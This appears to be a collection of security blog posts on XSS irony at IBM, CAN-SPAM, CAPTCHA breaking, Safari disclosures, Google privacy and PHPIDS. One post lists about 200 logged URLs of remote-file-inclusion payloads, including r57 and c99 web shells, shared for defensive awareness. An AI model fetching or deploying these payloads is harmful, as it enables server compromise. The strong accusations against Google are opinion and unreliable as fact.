My good (and hilarious I might add) friend Arian Evans from Whitehat Security sent this link out to a few people. Arian has a flair for the comedy - you’d just have to spend some time with him to really understand what I mean. The link made me laugh and thereby I am now sharing it with you. The link is to a QuickPlace XSS filter protection on IBM’s website. The irony here is that the link describing the virtues of XSS filtering is vulnerable to XSS. Oh what sweet irony.

Of course, it’s not really a huge deal, so much that it really is kind of embarrassing and exactly the reason why you should have someone who knows what they are doing looking at your security. In this case the XSS was injected into the xml:lang=… parameter. There’s a first! It’s an easy one to fix, and I’m sure it will be gone soon enough, but the irony almost made laugh so that I almost spit water out of my nose when I saw it. The moral of the story? Make sure to check your site for the vulnerability you claim to be able to prevent in your products.

There is an article on The Register about a phisher was was convicted of phishing AOL employees. You can go to the article to read the whole story. The part that I thought was amazing was not that he was phishing employees, or that he got caught, but that it was the first conviction under the Can Spam Act by a jury (there has been other convictions, but not by a jury).

Why CAN SPAM? Why now? CAN-SPAM defines SPAM as a “commercial electronic mail message” How is phishing a commercial electronic message? It may be fraud, but it’s certainly not commercial. To me it seems like a pretty worthless law, now moreso than ever. To me this law has always seemed like an easy out to explain why certain people are allowed to spam and why others aren’t without rhyme or reason. Yet have we seen a drop in spam? Do you feel comfortable putting your email address online without anti-spam filters in place to defend against the onslaught? I think not. Herein lies the failures of a useless law. This guy could have been convicted under a dozen other laws.

I felt the same way when I first read the law. One major problem with it is that it doesn’t deal with international spam. Instead of saying that anyone who spams is culpable and letting extradition treaties deal with the aftermath, CAN SPAM only applies to US citizens. How is that changing the problem? What if a US citizen is using offshore companies to do the deed for them? Clearly the CAN SPAM act needs a serious re-think in my opinion. Let’s either scrap it, or get a real law with some teeth. Perhaps one that holds ISPs financially responsible for hosting verified spam relays and hacked machines?

Rarely Greys posted a rather long article about how you can exploit users on Yahoo through cross site scripting vulnerabilities. The attack we all know and love. It’s a pretty interesting philosophical take on the issue actually. It does get technical near the end, including a PERL script to generate the attack on the fly.

In the end the vulnerability comes down to this exploit (click to see the XSS vulnerability). It uses an onerror event handler in an image, and since it can’t use quotes it uses String.fromCharCode to evade that. Well done. Not really news, except the writeup is pretty interesting as it goes into a lot more detail about how the attack works than I typically do.

As mentioned on Ronald’s blog and a rather suspicious digg entry linking to a referral code (indicating that the person who dugg this is somehow related to the site) there is a CAPTCHA breaking service located at decodetowin. The site claims to be running a sweepstakes and the only way to win is to “decode” the CAPTCHAs. Here is text from the site:

What is Decode to Win? Decode to Win is a contest website in which you decode graphical messages to increase your chance at winning a prize. You get one point for every message you decode. At the end of each week, we pick a random user from the top 15 point holders and send him/her a prize offering. In some cases, we will send prizes to more than one user.

No doubt, signing up adds your name to validated spam lists - they get you coming and they get you going. Interesting premise though. It appears that they are breaking Google CAPTCHAs by the looks of it, but it’s difficult to know for sure unless you are Google. One interesting thing I noticed as I was testing it is that the first one succeeds while the following tries always fail until you reload the flash file. It’s unclear why they do this, but my guess is that it is likely that people will try more than once, and it is unlikely that they will sign up. So it’s worth getting them to try three or more times to see if they simply typoed the second try. It’s out the folks, no one should doubt that CAPTCHAs definitely are being broken. Thanks to Ronald to pointing this one out.

In the last day there has been a number of vulnerabilities disclosed by researchers against the newly released Safari for Windows. The first was Dave Maynor’s full disclosure then came Aviv Raff’s disclosure and finally today Thor Larholm disclosed his vulnerability. Thor’s is probably furthest along in being an actual working exploit. Not a good day for Safari.

Probably the most interesting part of this is Dave Maynor’s reasons for going Full Disclosure. He doesn’t talk about it much on his blog, other than this little quip, “Keeping with our disclosure policy, we do not report bugs to Apple.” Apple has had a long history of bad dealings with security researchers, and they are now seeing a backlash amongst the security community. No surprises though, you get what you ask for. It pays not to make enemies in this business.

This is a non-technical post and completely my own opinion (as if you asked). I’m sure you all have seen this by now, in the news, on blogs, or even on Google’s employees’ sites but it’s time for me to discuss my view on Google’s recent ranking of the absolute worst privacy of the top 23 companies chosen for scrutiny by Privacy International in their latest report. They ranked lower than anyone else looked at, and the list included companies like Microsoft, eBay, Yahoo and MySpace. Here is a choice quote that should put to rest that this is simply some rogue company’s vendetta against Google as some people have conjectured:

This material, submitted by the Electronic Privacy Information Center (EPIC) and coupled with a submission to the FTC from the New York State Consumer Protection Board, provided additional weight for our assessment that Google has created the most onerous privacy environment on the Internet.

Again, Matt Cutts let me down when he responded to this by pointing to other people’s follies instead of focusing on Google’s privacy issues. Shame on you Matt - and didn’t Google buy a huge stake in AOL right before that privacy disclosure happened? It’s easy to point fingers but please do your homework first. I have to give Matt some leeway here - he may simply be ignorant of how the rest of the company operates.

Anyway, as a side note this was followed up by an interesting thread finding more places where a man in the middle could read usernames and passwords in Google. Google doesn’t have a great track record with security either. Tons of private information and very poor track record in keeping that information safe? Great combination.

I’ve had the dubious distinction of being tangentially part of some secret Google meetings (I am under no NDAs with them in any shape or form) and I have no doubt in my mind that every accusation made against them is true - and some I have actually seen myself. While Google plays the we’re not evil dance to the devil’s flute, the rest of the industry is actually trying to play by the rules. Even the FTC sided against Google in the Microsoft anti-trust case where Google claimed that Google’s Desktop wasn’t as useful on Vista as it was on XP. Microsoft’s answer? Google Desktop slows the computer down, it’s not Vista slowing Google’s Desktop down. Touché! I don’t blame the FTC for putting the advertising company in its place - especially an advertising company that intends on buying another advertising company that people have loathed for their privacy mis-deeds for nearly a decade (DoubleClick). I used to work for an advertising company - I personally have experienced how evil they are.

Google’s tools cannot be easily avoided, even by people who choose not to download their spyware. Adsense and Google Analytics also report home and can track users as they travel from domain to domain, as do the Google images that you see on search boxes that float all over the Internet. Unless consumers know how to avoid Google’s reach, they cannot simply avoid Google by not using their downloaded executables or their search engine. That to me constitutes a huge risk to privacy. That they delete or rather anonymize (and how good is that anonymization strategy, really?) after two years is irrelevant - that’s already too long when you combine it with all the other forms of information that they have access to and log. Yes, it is a requirement of the various governments they work with, but the governments don’t ask them to combine this information, they do that on their own.

The next most common thing I hear is that most of the tracked information is only used to tune the search engine. While that sounds like a noble task, what if I am uncomfortable with having personally identifiable information combined into custom or targeted search queries? Why is there no way to opt out of their reach (even DoubleClick had this)? Herein lies my biggest concern and why I recommend privacy concerned people seek alternatives. I’ve stopped using all things Google whenever possible, and am considering adding their entire netblock to my egress filters, except for testing purposes. While Google is an innovative company in some respects, I don’t trust the motives of an advertising company. Are they any better or worse than the others? There’s probably no way to know for sure, but at least the others are forthcoming.

I’ve been toying around quite a bit with robots who attempt to exploit the site in various ways. I’ve been seeing an interesting shift in robots that are moving away from direct exploitation until they detect that it is exploitable. That is interesting because it’s reducing the risk of someone just connecting to the script, downloading it and connecting to the controlling IRC servers. Here’s the list I got in today’s log file (please use extreme caution when viewing these - they are intentionally hostile in unknown ways):

http://2zero.by.ru/bot/echo.txt
http://38.99.89.50/.r/echo.txt
http://38.99.89.50/echo.txt
http://59.25.189.83/~upload/tt
http://66.235.205.131/echo
http://72.29.94.218/scr/evl.txt
http://80.86.105.122/echo.txt
http://afcomdfw.org/echo
http://albapower.de/id.txt
http://aldy.deep-ice.com/99.txt
http://aldy.deep-ice.com/mitra/echo.txt
http://aldy.ifastnet.com/xpl/echo.txt
http://alienr0x.by.ru/.spreag.txt
http://alienr0x.by.ru/r57.txt
http://andravarldar.se/cmd
http://arva.medusanetwork.com/echo.txt
http://az.co.cz/foto/c9.txt
http://b4ngs4t.com/echo
http://bacaplume.free.fr/manager/frontinc/services.txt
http://bavatuesdays.com//wp-content/plugins/wordtube/n00gr00d.txt
http://bb.domaindlx.com/armee/x.txt
http://br.geocities.com/darkteam4ever/echo.txt
http://br.geocities.com/porfook/engine.txt
http://bristoloakpaintballclub.com/calendar/calendar/includes/js/.,/.,/.,/test.txt
http://buceta.789mb.com/cmd1.txt
http://busca.uol.com.br/uol/index.html
http://bwlist.altervista.org/stringa.txt
http://chireo.info/n00gr00d.txt
http://clubmusic.caucasus.net/f22.txt
http://cmdfile.ifastnet.com/cmd/57.txt
http://cmdfile.ifastnet.com/cmd/a.txt
http://coccor0x.altervista.org/response.txt
http://d3prive.my-place.us/id.txt
http://d4rk4ir.altervista.org/r57.txt
http://dandorohoi.0catch.com/.r/echo.txt
http://deporpasto.com/portal/components/com_smo_ajax_shoutbox/languages/cmd.do
http://detroit.my-php.net/id.txt
http://dezzign.ru/echo
http://diving.actionpro.cz/galerie/tmp/vob.txt
http://dj.eliteradio.info/ech21o.txt
http://dj.eliteradio.info/echo.txt
http://drxrwx.ifastnet.com/57.txt
http://drxrwx.ifastnet.com/a.txt
http://dvl.by.ru/cmd/r57shell.txt
http://ebrain.netfast.org/r57
http://efardella.cinet.it/claroline/phpbb/id.txt
http://emi.faccat.br/coisasdowindovaio/freeman.txt
http://empore.altervista.org/rox.txt
http://equipexapadao.com/echo
http://faillurecorp.iespana.es/evals.txt
http://faillurecorp.iespana.es/id.txt
http://for-a.co.in/vulgar.htm
http://founder-poltekcrews-allnetwork.org/echo
http://freewebs.com/celinho/id.txt
http://freewebs.com/sak4w/r57.txt
http://geocities.com/surabayateam/vulgar.gif
http://gnuworld.evolink.ro/xxx/3739.echo.txt
http://h1.ripway.com/eownz/id.txt
http://h1.ripway.com/h4ck/echo.txt
http://h1.ripway.com/overcashxd/echo
http://h1.ripway.com/thc/id.txt
http://hacker.to.md/Qe3
http://hacker.to.md/mesin
http://hacker.to.md/x
http://happy.altervista.org/name.txt
http://heidik.org/y/id.txt
http://heritagelost.net/phpraid/cmd.txt
http://hokkian.dalnetz.biz/cibe.txt
http://ht-o.de/hto/images/echo
http://ikhlas.com.my/57.txt
http://ikhlas.com.my/cmd.txt
http://int0xic.by.ru/id.txt
http://jargo.phpnet.us/ilkom.txt
http://k52.jp/echo
http://kaoru-t.com/cache/echo.txt
http://kretenovich.phpnet.us/cmd.gif
http://l3to.by.ru/id.txt
http://lamerma.com.ve/n00gr00d.txt
http://lifechangerscc.com//catalog/includes/asd.txt
http://lifechangerscc.com//catalog/includes/cmd.txt
http://lppm.uns.ac.id/r57.txt
http://luis.infopiera.com/evl.txt
http://mabiographie.fr/httaccess
http://maxdemon.1sthost.org/docs/robot.txt
http://members.lycos.co.uk/modelteam/echo.txt
http://mensagem.us/hack/echo
http://multiplex.netfast.org/stringa.txt
http://nainty.xlphp.net/c99.txt
http://napushenko.phpnet.us/evl.txt
http://nemecsek87.altervista.org/ciao.jpg
http://netbarg.com/admin/backups/id.txt
http://new.bacone.edu/mambo/help.txt
http://niigatakubota.co.jp/.defacer/.secret/echo
http://nikkeydetetives.com/over/echo
http://nocommercial.altervista.org/my/nc.txt
http://norman.webspacemania.com/id.txt
http://norman.webspacemania.com/r57.txt
http://nosaj.1sweethost.com/freeman.txt
http://nxlf.cn/1
http://offzinho.netfast.org/57
http://openl4b.altervista.org/CMD.txt
http://partyaccess.net/2007/components/com_extcalendar/echo
http://pasto.com/administrator/components/safe.txt
http://perdu.ch/cgi-bin/echo
http://portal.isara.fr/claro151grain/claroline/auth/ldap/…bl/…/stringa.txt
http://priv8.netfast.org/cmd/r57.gif
http://putogame.webspacemania.com/r57.txt
http://putogame.webspacemania.com/safe.txt
http://raz0r-sh4rks.org/id.txt
http://redza.t35.com/xpl/injek
http://reshack.ifastnet.com/xpl/xpl.txt
http://rizla2.interfree.it/p.txt
http://rootkay.by.ru/id.txt
http://rotaryclub-fulham.org//components/com_extcalendar/cmd.txt
http://rpgnet.com/images/m4f14d3c4lc1nh4.txt
http://sanwall.info/echo.txt
http://scan.prohosts.org/echo.txt
http://serc.ilc.edu.tw/echo
http://site.netspace.pt/media/echo.php
http://sniffo.by.ru/SuPrEmO.txt
http://stip-city.org/evl.txt
http://suntikan.org/echo
http://sup3rskunk.interfree.it/c99.txt
http://sup3rskunk.interfree.it/o.txt
http://symboliclynx.com/images/a
http://tauzendmark.ro/.r/echo.txt
http://thebadfox.jeeran.com/c99.txt
http://thedivaslist.com/.r/echo.txt
http://thelostsummer.com/x.do
http://theoriginalista.altervista.org/unix/no.txt
http://topnlpsites.com/images/gif/echo.txt
http://tosa.altervista.org/stringa.txt
http://treo.palmtop.pl/klub/Cmd.txt
http://ulil.xlphp.net/msn/msn
http://va7in.phpnet.us/vhv
http://valdhano.phpnet.us/gfs
http://valdhano.phpnet.us/vhv
http://varmvaffel.no-ip.com/andy/c99.txt
http://vcsok.com/echo
http://vegeta.co.jp/echo
http://vh1.srt.com.cn/sewam/c99.txt
http://waou.altervista.org/r57.txt
http://woodshack.com/components/com_phpshop/shop_image/help/freeman.txt
http://www.247live7.com/diablocrew/cmd.txt
http://www.Leonard0.kit.net/echo.txt
http://www.activekitten.com//bitrix/updates/ciola.txt
http://www.apnic.net/index.html
http://www.article-website.co.uk/admin/backup/RipperzCrewz
http://www.asqbuffalo.org/backups/freeman.txt
http://www.bastardirc.net/scan5.txt
http://www.bewahrer-azeroth.de/phpraid//raid_lua/asd.txt
http://www.chv.ro/cache/0day
http://www.defi.isep.ipp.pt/~jaa/cache/a
http://www.dgsport.be/components/res.txt
http://www.eclypse.info/oche
http://www.ekin0x.com/r57.txt
http://www.equipexapadao.com//id.txt
http://www.equipexapadao.com/echo
http://www.equipexapadao.com/id.txt
http://www.esto.sky7.us/RipperzCrewz
http://www.esto.sky7.us/SECRET.c
http://www.facepi.com.br/cache/…/botnet/out2.txt
http://www.fena.nu//components/com_rsgallery/r57rex.txt
http://www.freewebs.com/alezinn/n00gr00d.txt
http://www.geocities.com/junlee_180/metro/yeyen.txt
http://www.geocities.com/kampusunika/lamercrew.txt
http://www.geocities.com/kharisma_usada_mustika/checkit.txt
http://www.gonfiabiligamespark.it/flash/r57.txt
http://www.gritservice.it/r57.txt
http://www.hanovercova.us/business/x.txt
http://www.himagara-unila.com/x.do
http://www.k1ll3rx.addr.com/id.txt
http://www.kebcomputer.com/cache/error.txt
http://www.kebcomputer.com/cache/tess.txt
http://www.kebcomputer.com/cache/tests.txt
http://www.kelserific.xpg.com.br/tool25.txt
http://www.kendera.com.br/mvk.txt
http://www.leonard0.kit.net/echo.txt
http://www.modulardepot.com/smallimages/help/freeman.txt
http://www.mvmedia.com/old/Cmd.txt
http://www.mydezent.de/dload/pdl-gfx/ciola.txt
http://www.panglimacollection.com/titid.gif
http://www.panglimacollection.com/titid.txt
http://www.phazethree.com/shoponline/images/CMD.txt
http://www.pic4.us/pic/wvj89367.gif
http://www.private-scan.kit.net/evl.txt
http://www.pronext.eu/help/a.txt
http://www.propgpq.uece.br/mdb/echo
http://www.raaness.no/a
http://www.rhino-invest.info/FIP/id.txt
http://www.rpgnet.com/images/m4f14d3c4lc1nh4.txt
http://www.stockgoeroe.com/main.txt
http://www.subway56.com/delivery/modules/maindisplay/id.txt
http://www.sunshinefalls.com/Templates/.m/string.jpg
http://www.t5kclan.com/echo
http://www.tarcisiobr.kit.net/echo.txt
http://www.telecom.conexlink.com/includes/cache_tpls/freeman.txt
http://www.the-esao.com/imag/stringa.txt
http://www.thedivaslist.com/.r/echo.txt
http://www.thegrumbleweeds.com/pubgal/freeman.txt
http://www.thelostsummer.com/x.do
http://www.thiaguinho.net/id.txt
http://www.trendsturm.de/catalog/includes/help/freeman.txt
http://www.triton.xpg.com.br/biscate.txt
http://www.ugurfotograf.com/resources/incoming/a.txt
http://www.velozbr.netfast.org/Cmd/r57.txt
http://www.vortex2.altervista.org/cmd.txt
http://www.wantme.ca/cache/.,/.,/.,/test.txt
http://www.webbmakaren.se/test/admin/img/help/cmd.txt
http://www.webbmakaren.se/test/admin/img/help/freeman.txt
http://www.wow-insomnia.com/images/cmd.txt
http://www.yotasurf.co.uk/coppermine/albums/CMD.TXT
http://www.yufa.spb.ru/modules/coppermine/include/main.txt
http://www1.greenpeace.org.hk/camp/id.txt
http://xmlstuff.ifastnet.com/cmd/cmdx.do
http://xoomer.alice.it/hackz/ahah/no.php
http://xoomer.alice.it/marian0zx/ahah/no.php
http://xoomer.alice.it/marian0zx/ahah/solo.php
http://xoomer.alice.it/uploadftp/r57rex.txt
http://xpl46.altervista.org/config.txt
http://xpls.my-place.us/own.txt
http://younes.by.ru/c99.txt

You’ll notice an awful lot of “echo” versions which (when still valid) return content like:

<? echo "1122548"; ?>

Apparently others have seen this as well so it’s not just me. This is a shift in tactics that will no doubt have a big impact on the survivability of bot-nets as they will be more difficult to detect. The only problem is that the numbers don’t appear to be dynamic. It won’t take long to correct that, which will mean that seeing what the bots are doing will require honeypots. It’ll be interesting to see the bots evolve over time.

christ1an just announced that PHPIDS has been released. This has been in development for quite a while, but the intention is to react (more like an IPS than an IDS) to potential attacks. From the site:

The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to.

If you are running any custom PHP programs, I’d suggest taking this for a spin. As it is a first public release there will no doubt be some issues, but with the community’s help, hopefully this will turn into more of a ubiquitous tool to stop attackers from exploiting PHP applications. Please provide feedback about it’s use. I’m sure it will become a valuable resource. Nice work by .mario, crist1an and Lars.

A few days ago Sylvan von Stuppe posted about a proposed change to Firefox 3.0 that changes the way the address bar works. I hadn’t heard this proposal, but it’s an interesting one. Basically they grey out the parts of the URL that aren’t the domain. Sylvan correctly pointed out that although that’s good for showing users that they are connecting to sites other than the one they meant to go to, it has nothing to do with the content on the page. XSS is still an obvious way around this, as the malicious content can be injected onto valid pages. According to Zeno MITRE is about to disclose that XSS is the attacker’s choice.

Although I should say that I do think this idea is a fairly good one, but there is at least one other problem with it. Almost all websites have IP addresses associated with them (except in the case of virtual hosts that also require a Host: header). Just because it’s an IP doesn’t mean it’s bad. I can’t tell you how annoying I think Thunderbird’s anti-phishing filter is to me always thinking every URL with an IP in it is a phishing attempt. That’s just not a good way to know if something is malicious or not. But I would like to see the consumer research that says people will actually use this and not be fooled by it. I’m always a little wary of “look for the ____” type security given how poorly the “look for the lock” security education has proven to work for SSL.

A few weeks ago Ben Maurer posted a link to a service called reCAPTCHA that attempts to solve the spam problem in the typical CAPTCHA way while solving another hard problem at the same time. reCAPTCHA is a part of a project to scan old books. But part of the problem with scanning using OCR is that you get crap results sometimes. Therein lies the reCAPTCHA idea - replaying that odd looking text to users and getting them to type the answers in, next to a real CAPTCHA. Knowing that one is correct assumes that the OCR image is valid.

So the next question you have is that what if someone doesn’t answer the second question at all or puts in something erroneous - that’s okay it uses a voting system to make sure more than one person agrees (I’m not sure on the specifics of the voting system). That makes for a pretty interesting system in a lot of ways. However, one comment made by “Anonymous” on Ben’s site caught my eye.

“Chinese radio scare alert: these people want to exploit your brainpower with their captcha tricks! It’s like enslaving humanity, one word at a time!”

You certainly get extra points for originality of your idea.

I’m sure nobody will get my Chinese radio reference though…

What Anonymous is referring to is the Chinese Lottery. It’s a theory in cryptography where you can force many people to do very small tasks to get the answer to a bigger problem (in the lottery example force the government supplied radios to perform small parts of a very large crypto problem). For instance, if they can somehow ask users to perform a math function that is somehow more efficient for a user to do than a computer, then it makes sense. There is another similar theory using biochemical reactions in a DESasour, where each cell of an organism combines to perform a computationally complex task, but given the volume of cells in any sizable creature, it would have enormous computing power.

Granted reCAPTCHA is terrible at this - it is far more efficient to perform any mathematical task with a computer than anything a human could do. The only way I could see this being used in a nefarious way, other than the CAPTCHA proxy idea is if part of what a government needed to do was OCR classified documents (this could be even more effective in other languages where translation services are at a premium). While possible, it sounds like quite a conspiracy theory to me. But Anonymous can rest assured that someone out there understood his reference!